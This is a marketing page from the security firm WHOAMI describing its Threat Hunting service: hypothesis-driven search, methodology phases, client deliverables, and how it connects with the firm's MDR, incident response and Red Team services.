Threat Hunting

WHOAMI's Threat Hunting service provides proactive threat search through hypotheses based on threat intelligence, attack technique analysis, and hypothesis validation. Unlike reactive detection based solely on rules, our approach identifies advanced and persistent threats that might go unnoticed through directed search and contextual analysis.

Threat Hunting Service

WHOAMI offers its Threat Hunting service to organizations that need to identify advanced and persistent threats that might go unnoticed through traditional detection. Our approach combines proactive search based on hypotheses with threat intelligence relevant to your context.

Threat Hunting for Companies

Our Threat Hunting service is designed for organizations that need to go beyond reactive detection: they seek to identify advanced and persistent threats through proactive search based on hypotheses and threat intelligence. Unlike rule-based detection alone, threat hunting identifies threats that might go unnoticed.

Threat hunting enables your organization to:

• Identify advanced threats through proactive search based on hypotheses and threat intelligence
• Detect persistent activity that might go unnoticed through traditional detection
• Improve security posture through continuous threat identification and recommendations
• Reduce detection time through proactive threat identification before they materialize
• Validate controls through identification of gaps in detection and response

Objectives of the Threat Hunting Service

The main objective of our Threat Hunting service is to identify advanced and persistent threats through proactive search based on hypotheses and threat intelligence, reducing detection time and improving security posture.

Specific objectives include:

• Identify advanced threats through proactive search based on hypotheses
• Detect persistent activity that might go unnoticed through traditional detection
• Validate control effectiveness through identification of detection gaps
• Improve security posture through continuous threat identification
• Provide recommendations for detection and response improvement
• Integrate threat hunting with existing security processes

Benefits of Threat Hunting

The benefits of implementing a Threat Hunting service are significant and go beyond reactive detection:

WHOAMI's Approach to Threat Hunting

Our Threat Hunting service differs by integrating Cyber Intelligence, offensive analysis, and security operations experience with proactive search. We don't perform generic searches: we develop hypotheses based on real threats relevant to your organization.

We integrate our experience in offensive operations and threat analysis to:

• Develop hypotheses based on threat intelligence relevant to your organization
• Analyze techniques, tactics, and procedures (TTPs) of relevant adversaries
• Validate hypotheses through data analysis and correlation with real threats
• Provide context about adversaries and techniques to accelerate response
• Connect threat hunting with Red Team exercises and simulations

Threat Hunting Methodology

Our threat hunting methodology integrates multiple approaches to identify threats effectively:

Hypothesis Development

We develop hypotheses based on threat intelligence and technique analysis:

• Analysis of threat intelligence relevant to your organization
• Identification of techniques, tactics, and procedures (TTPs) of relevant adversaries
• Development of hypotheses about potential adversary activity
• Hypothesis prioritization according to probability and potential impact

Search and Analysis

We perform proactive search and data analysis to validate hypotheses:

• Proactive search for indicators and patterns in security data
• Analysis of logs, events, and system data to identify suspicious activity
• Correlation of findings with threat intelligence and known techniques
• Hypothesis validation through contextual analysis and correlation

Validation and Context

We validate findings and provide context about identified threats:

• Finding validation through technical analysis and correlation
• Context analysis about adversaries and used techniques
• Assessment of potential impact of identified threats
• Development of recommendations for detection and response

Evolution and Improvement

We evolve hypotheses and improve capabilities according to findings:

• Development of new hypotheses based on findings and threat intelligence
• Improvement of detection capabilities based on identified threats
• Update of rules and processes according to emerging techniques
• Integration of findings with existing security processes

Deliverables (what the client receives)

To sell Threat Hunting you need to specify what the client receives. Our service provides clear and actionable deliverables:

• Threat hunting report: Detailed analysis of developed hypotheses, performed searches, identified findings, and detected threats
• Analysis of identified threats: Context about adversaries, used techniques, potential impact, and response recommendations
• Improvement recommendations: Prioritized guides for detection improvement, alert rules, and response processes based on findings
• Control validation: Analysis of detection control effectiveness and gap identification
• Future hypotheses: Development of new hypotheses based on findings and threat intelligence for future searches
• Review session: Meeting to present results, validate findings, and align actions with security objectives

Threat Hunting Service Process

Our Threat Hunting service is structured in phases that ensure effective and sustainable implementation:

Phase 1: Context and Intelligence Analysis

In this initial phase, we analyze context and threat intelligence to develop hypotheses:

• Analysis of your infrastructure, critical systems, and sensitive assets
• Review of threat intelligence relevant to your organization
• Identification of techniques, tactics, and procedures (TTPs) of relevant adversaries
• Analysis of historical threats and previous incidents
• Development of initial hypotheses based on threat intelligence

Phase 2: Search and Validation

During this phase, we perform proactive search and validate hypotheses:

• Proactive search for indicators and patterns in security data
• Analysis of logs, events, and system data to identify suspicious activity
• Correlation of findings with threat intelligence and known techniques
• Hypothesis validation through contextual analysis and correlation
• Identification of threats and suspicious activity

Phase 3: Analysis and Context

In this phase, we analyze findings and provide context:

• Technical analysis of identified threats and suspicious activity
• Context about adversaries and used techniques
• Assessment of potential impact of identified threats
• Development of recommendations for detection and response
• Validation of detection control effectiveness

Phase 4: Integration and Evolution

Integration and evolution ensure threat hunting remains effective:

• Integration of findings with existing security processes
• Development of new hypotheses based on findings and threat intelligence
• Improvement of detection capabilities based on identified threats
• Update of rules and processes according to emerging techniques
• Continuous evolution of methodology according to lessons learned

Threat Hunting vs Traditional Detection

Threat Hunting complements traditional detection by providing proactive search:

Integration with Other Services

Our Threat Hunting service integrates naturally with other WHOAMI services:

• Cyber Intelligence: Threat intelligence provides context for hypothesis development and finding validation
• MDR Services: Threat hunting complements rule-based detection through proactive search
• Incident Response: Threat hunting findings inform incident response through context about identified threats
• Red Team: Red Team exercises validate threat hunting effectiveness through attack simulations